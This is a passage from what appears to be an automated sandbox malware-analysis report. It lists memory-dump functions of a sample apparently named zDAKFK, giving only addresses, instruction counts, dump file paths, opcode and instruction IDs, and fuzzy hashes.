                                                                                                                                                                      • Opcode ID: ae4ec7cab35fdb53616a400938adaa83e42ebdfc03591761a89eafb0a16c2316
                                                                                                                                                                      • Instruction ID: d6730cff4c89f01e0f970ed1a9b597d3d36e20fe2baf96dfa983fe3531c404a3
                                                                                                                                                                      • Opcode Fuzzy Hash: ae4ec7cab35fdb53616a400938adaa83e42ebdfc03591761a89eafb0a16c2316
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A11A3763442404FDB148B29D8D56A83BE6FFC6314B1D80BAE14ACF7A3D569EC0697A0
                                                                                                                                                                      Function 04A930F1 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7e894fbaaffaf80d03b4e35bb6070c21c01e0780602b0f0f053a35810e8863e0
                                                                                                                                                                      • Instruction ID: 9fd944ad41339442b184637f5b34418498870f2492d1470c1e1e72451e0c4b1e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e894fbaaffaf80d03b4e35bb6070c21c01e0780602b0f0f053a35810e8863e0
                                                                                                                                                                      • Instruction Fuzzy Hash: BB1166317062219FDF096725A814AFC7BE5DFC5709B09407AE809CB2A2CB25AC0397E1
                                                                                                                                                                      Function 04A9C020 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d62481b9379f966c4da4e02272832c34a731eacb8bb0954381e84a0feb5872cb
                                                                                                                                                                      • Instruction ID: 8aca10b9d7b2adb3d0747ebe43c19715ba7523cce4df7e59351185b8a468db7f
                                                                                                                                                                      • Opcode Fuzzy Hash: d62481b9379f966c4da4e02272832c34a731eacb8bb0954381e84a0feb5872cb
                                                                                                                                                                      • Instruction Fuzzy Hash: B7118B31600644AFD719EB69D445BAAB7E6EFC1318F00C83DE1298B251DA36ED09C7A1
                                                                                                                                                                      Function 04A90872 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4651aa86c45e97222f2a40cd9b441ad2f690f9fdedc572be0c7c28048e631acb
                                                                                                                                                                      • Instruction ID: c8a4f3ca74ccc86459e57f8abc80eebe14cc3dfdd621169a03f0d4c2b69d430a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4651aa86c45e97222f2a40cd9b441ad2f690f9fdedc572be0c7c28048e631acb
                                                                                                                                                                      • Instruction Fuzzy Hash: 48119E31B05B004BEB34DF29D44175AB7F2BF85794F040A2EE496CBA41D738F9098B92
                                                                                                                                                                      Function 04A91C2C Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ec4aaf406cceb2f35b872456340f4866b3d92d8a14ce1ee9af1f2c1899900469
                                                                                                                                                                      • Instruction ID: 3e711246cf55561e2f21f58f4ffd399da81de0aee0b83ae2d334bed7413d9eda
                                                                                                                                                                      • Opcode Fuzzy Hash: ec4aaf406cceb2f35b872456340f4866b3d92d8a14ce1ee9af1f2c1899900469
                                                                                                                                                                      • Instruction Fuzzy Hash: 57214234600706CFDB54EB78C444AAAB3F6EF85319F10896DD4695B274DF71B88ACB81
                                                                                                                                                                      Function 04A931C0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b0bce1fda9a2258208e46edc28a00ba6d8264358f7f537debae081f412cede5d
                                                                                                                                                                      • Instruction ID: fe1f7df886339f0417af2bf64b4930959bf45f3cafbea3f154586b2ce52c30ad
                                                                                                                                                                      • Opcode Fuzzy Hash: b0bce1fda9a2258208e46edc28a00ba6d8264358f7f537debae081f412cede5d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C218E35600706CFDB59EB78C444AAAB7F6EF85315F0084BDD0591B260DF31A88ACB81
                                                                                                                                                                      Function 008ED4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766232691.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8ed000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                      • Instruction ID: 3330c689c45aa7897cbb180579b3747aa3eeee490ab5a841e9b73db756940678
                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                      • Instruction Fuzzy Hash: A311B176504380CFCB16CF14D9C4B16BF71FB94318F24C6AAD8494B656C336D85ACBA1
                                                                                                                                                                      Function 008FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction ID: 2626c95c78107abf64b95225c5b6695220254304b8c310642941d797f0a3205d
                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7211BE75504344DFCB02CF20C5C4B25BB62FB84314F24C6AADA498B256C33AE80ACB91
                                                                                                                                                                      Function 008FD017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction ID: d2cfdcd8f217cc85eaa34925b9b3920171c4983938793c1bba417af50da9b747
                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A11BE75504784CFCB15CF24D5C4B25FB62FB84314F24C6AADA098B656C33AD80ACB61
                                                                                                                                                                      Function 04A987C8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6cb3f4630a7b6e120fb425b85065665dfd55a268b5ab1bc9ff2ae854b3379337
                                                                                                                                                                      • Instruction ID: de002c430284975c4024792a5049649c2e14925481e8b60525347e3768c10dd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cb3f4630a7b6e120fb425b85065665dfd55a268b5ab1bc9ff2ae854b3379337
                                                                                                                                                                      • Instruction Fuzzy Hash: 901104B5C102098FDB10DFAAD544BDEFBF4EB49360F10C42AD859A7210D378A545CFA5
                                                                                                                                                                      Function 04A9910C Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1dfad3f565b00f39a27b51121371690084edd2299a56e28d11d40f58ca1f50dd
                                                                                                                                                                      • Instruction ID: 2b42bfe61df5a4f8d1752a89bd088dba1af2f6ebc701a1e435f02a9f05cc13e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 1dfad3f565b00f39a27b51121371690084edd2299a56e28d11d40f58ca1f50dd
                                                                                                                                                                      • Instruction Fuzzy Hash: C401F271B093547BEB05DB7998144AEBFEADF8A124B1480AED84DC7341EA20EC428395
                                                                                                                                                                      Function 04A97BDC Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5b78415cf658f642636a412c17e10698014a56496a12382ec2e3825e04b25246
                                                                                                                                                                      • Instruction ID: e8cd517d268bb3a2ef198f2ea590d55efd61ce40e17a975a55f33057b735ba8a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b78415cf658f642636a412c17e10698014a56496a12382ec2e3825e04b25246
                                                                                                                                                                      • Instruction Fuzzy Hash: FD1104B1D042489FDB10DFAAD444B9EFBF4EB49364F10C42AE859A7310D378A945CFA5
                                                                                                                                                                      Function 04A99C6B Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b494bfde27ca65468d340622a11a8b8f32f4f9788f547ed64d073092fd4e25f7
                                                                                                                                                                      • Instruction ID: 672e1401372b1e87e152796a89ee9ea6e38978fc15d47315268e0718f618b765
                                                                                                                                                                      • Opcode Fuzzy Hash: b494bfde27ca65468d340622a11a8b8f32f4f9788f547ed64d073092fd4e25f7
                                                                                                                                                                      • Instruction Fuzzy Hash: 671145B59002488FCB20DF9AC588BDEFFF8EB48320F20841AD459A7310C334A985CFA5
                                                                                                                                                                      Function 008ED745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766232691.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8ed000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ee1bba1f5ed17ef230f1400a78a938fd4476bbdd4a8aeb3b86a5bca4ef164f01
                                                                                                                                                                      • Instruction ID: ae6215f1b7e32eea668e60a5c590859cd9be5846e3196c1c2045be90f334bd94
                                                                                                                                                                      • Opcode Fuzzy Hash: ee1bba1f5ed17ef230f1400a78a938fd4476bbdd4a8aeb3b86a5bca4ef164f01
                                                                                                                                                                      • Instruction Fuzzy Hash: F3012B310083849AE7109F27CDC4B67BFD8FF42324F18C52AED198E286C279D884CAB1
                                                                                                                                                                      Function 04A92CF0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 73ae5cae4c5cd732d0d31c1bb57c144107d9ef039c63ae4e4dd95b3371c5ab3d
                                                                                                                                                                      • Instruction ID: 2a7d9bafe4715de86451993945e222ed7a6fa02a8f651e8a1131728ba05e6b80
                                                                                                                                                                      • Opcode Fuzzy Hash: 73ae5cae4c5cd732d0d31c1bb57c144107d9ef039c63ae4e4dd95b3371c5ab3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001B130A18298AFDF14DB65D490EDDBFF1BF4A314F144099E841FB361C675A901CB50
                                                                                                                                                                      Function 04A98D30 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d779d484ea85168004f62f84cc038b6091671c4d537b56602196b3e3414b1936
                                                                                                                                                                      • Instruction ID: 3623cf1260dc377dbbe9345cb87094d870c5b0c08277ee2a88ef29d6afa0eeaf
                                                                                                                                                                      • Opcode Fuzzy Hash: d779d484ea85168004f62f84cc038b6091671c4d537b56602196b3e3414b1936
                                                                                                                                                                      • Instruction Fuzzy Hash: 85017D75B10251CFEF16B7789D804FE7BF19F88209F000069E104A7382CA302E1287F5
                                                                                                                                                                      Function 04A99C70 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: aea1cfe9a60ca8cf7fa5d446bca6950d014950ce3f8ff4b799e0e39da7ac3fc5
                                                                                                                                                                      • Instruction ID: 327565c26603363e173c3b86bdd2f9e0dab5307a84a8d35b4b8506f572b40fc5
                                                                                                                                                                      • Opcode Fuzzy Hash: aea1cfe9a60ca8cf7fa5d446bca6950d014950ce3f8ff4b799e0e39da7ac3fc5
                                                                                                                                                                      • Instruction Fuzzy Hash: CD1112B59003488FCB20DF9AC548BDEFBF8EB48320F20841AD559A7310C374A984CFA5
                                                                                                                                                                      Function 04A9B2F8 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 13369ad2ee3138268915557b6a56b9d94e1f38efa4d259cb123ec0b82c509329
                                                                                                                                                                      • Instruction ID: f8cc51a73d2bcb24b7d52fc552f86ebaae95791f67bc7f8f70ad6ede7b233554
                                                                                                                                                                      • Opcode Fuzzy Hash: 13369ad2ee3138268915557b6a56b9d94e1f38efa4d259cb123ec0b82c509329
                                                                                                                                                                      • Instruction Fuzzy Hash: FBF096313042619FDF25972AA4907FE27F6BF81A55B0900AAD846C7951DA24FC47D770
                                                                                                                                                                      Function 04A98D40 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ddefbda26473485270942ef1238430147d08cd4739b10172b0343dc6329feedb
                                                                                                                                                                      • Instruction ID: 45a8e5cf5b278bc3e21351ac32f038b67a5888cef2e4c88bed49cd4e6c85875e
                                                                                                                                                                      • Opcode Fuzzy Hash: ddefbda26473485270942ef1238430147d08cd4739b10172b0343dc6329feedb
                                                                                                                                                                      • Instruction Fuzzy Hash: EAF0BB75B10115DB9F25B7B89D504BFBBFADBC8615F000028E505A7340DE306E1187F5
                                                                                                                                                                      Function 04A9AEC4 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b28caaa9b3d67998219d49336d6977a311ceeaa1d50fbb2a8063407d6c3c096d
                                                                                                                                                                      • Instruction ID: cdf47e479f9b6c921c6fa72fb238eaff9e05639f87ea413449a9c033fb19e40a
                                                                                                                                                                      • Opcode Fuzzy Hash: b28caaa9b3d67998219d49336d6977a311ceeaa1d50fbb2a8063407d6c3c096d
                                                                                                                                                                      • Instruction Fuzzy Hash: AFF0B4303042218BDF14DB2EA550AFB73EAAFC0A01708042AE406C3A50DA20FC01D770
                                                                                                                                                                      Function 04A92F68 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0108316313e8494294fc2bae6d16b261bdfbe90c1e30319c540aeb1733d41dc0
                                                                                                                                                                      • Instruction ID: 2386d6633a709d5992b156109257a4ec171798d6a47e6e8c1a2a95ef31452939
                                                                                                                                                                      • Opcode Fuzzy Hash: 0108316313e8494294fc2bae6d16b261bdfbe90c1e30319c540aeb1733d41dc0
                                                                                                                                                                      • Instruction Fuzzy Hash: 68018F31A046558FDB05FB6CC8184AD7FB1FF85304B0681E9E54A9B272EB24ED84CBD1
                                                                                                                                                                      Function 04A9B7B2 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fa611dc3252f78049eb17a2d82338cc35a6645ec52547ca53deb98c6d0dcb904
                                                                                                                                                                      • Instruction ID: 98e00898ae4d4f33ba5de823202883384e56c9e1c0647c464a479a317bf3148e
                                                                                                                                                                      • Opcode Fuzzy Hash: fa611dc3252f78049eb17a2d82338cc35a6645ec52547ca53deb98c6d0dcb904
                                                                                                                                                                      • Instruction Fuzzy Hash: 49F0B4713005504BDF19AB39A1A46BD67E6EFC8655715412ED806C7390CF39FC43C760
                                                                                                                                                                      Function 04A9A139 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 35b94f5d662bc3aa1d7af28135220b4c67967f9a15afe114a0e47c5ee8747155
                                                                                                                                                                      • Instruction ID: 6efa27d3b1a7e67a45d0633a50a38c75a13f81630354c404ef51a3a6e8b44afe
                                                                                                                                                                      • Opcode Fuzzy Hash: 35b94f5d662bc3aa1d7af28135220b4c67967f9a15afe114a0e47c5ee8747155
                                                                                                                                                                      • Instruction Fuzzy Hash: DB010470D00209DFCB40EFA8C5859EDBBF0EF48210F1182AAE859EB321E7709A45CF81
                                                                                                                                                                      Function 04A9B7B8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a0dca0c7ab53650793a76c4633943f552a8ca7b264d3183b6785c3e087c9259c
                                                                                                                                                                      • Instruction ID: 2ac760dab7099f76114b774104fc2c00e9df3843d23571850f3e4f41a869dc9f
                                                                                                                                                                      • Opcode Fuzzy Hash: a0dca0c7ab53650793a76c4633943f552a8ca7b264d3183b6785c3e087c9259c
                                                                                                                                                                      • Instruction Fuzzy Hash: 79F08275300560879F19AB39A164A7D72EAAFC8655715802EE406CB390CF39FC42C7A5
                                                                                                                                                                      Function 008ED744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766232691.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8ed000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a879c09dd3c473c6cab78961309f2cb4f1ecb4d429b0526dd543155c04be98df
                                                                                                                                                                      • Instruction ID: 78b47bf9154f90afc3692e882e245b634356a96b7b8bd3e1a59f9ed80cdc0f2d
                                                                                                                                                                      • Opcode Fuzzy Hash: a879c09dd3c473c6cab78961309f2cb4f1ecb4d429b0526dd543155c04be98df
                                                                                                                                                                      • Instruction Fuzzy Hash: 40F062714083849EE7109F16DDC8B62FFA8EB96734F18C55AED484A286C2799844CBB1
                                                                                                                                                                      Function 04A92600 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 40c1c174eef657783d84a4cd7af6f91dd115ee7078bada33cbf0aad79eb7fff5
                                                                                                                                                                      • Instruction ID: 19b1048604df3a1501747dced5ce229ffc2798091c314ab49f9d3c3d6d62e959
                                                                                                                                                                      • Opcode Fuzzy Hash: 40c1c174eef657783d84a4cd7af6f91dd115ee7078bada33cbf0aad79eb7fff5
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF0B4362053469FCB05AF78D440E997FE9EF8A39470548A6F904CF276DA75AD02CB90
                                                                                                                                                                      Function 04A92F78 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 05f3c3fe546a22c056df63366ec137af5578417f923c5cfc0c807e012178b8e4
                                                                                                                                                                      • Instruction ID: e0a9f80e373a2b94a914394ceb8d5e7ee9224cc7e1c0edfbe65b144ad4d4db8f
                                                                                                                                                                      • Opcode Fuzzy Hash: 05f3c3fe546a22c056df63366ec137af5578417f923c5cfc0c807e012178b8e4
                                                                                                                                                                      • Instruction Fuzzy Hash: CAF01D30A006198FCB04FB6CD4198ADBBB1FF85304F4181A9E5099B265EB65AD84CBD5
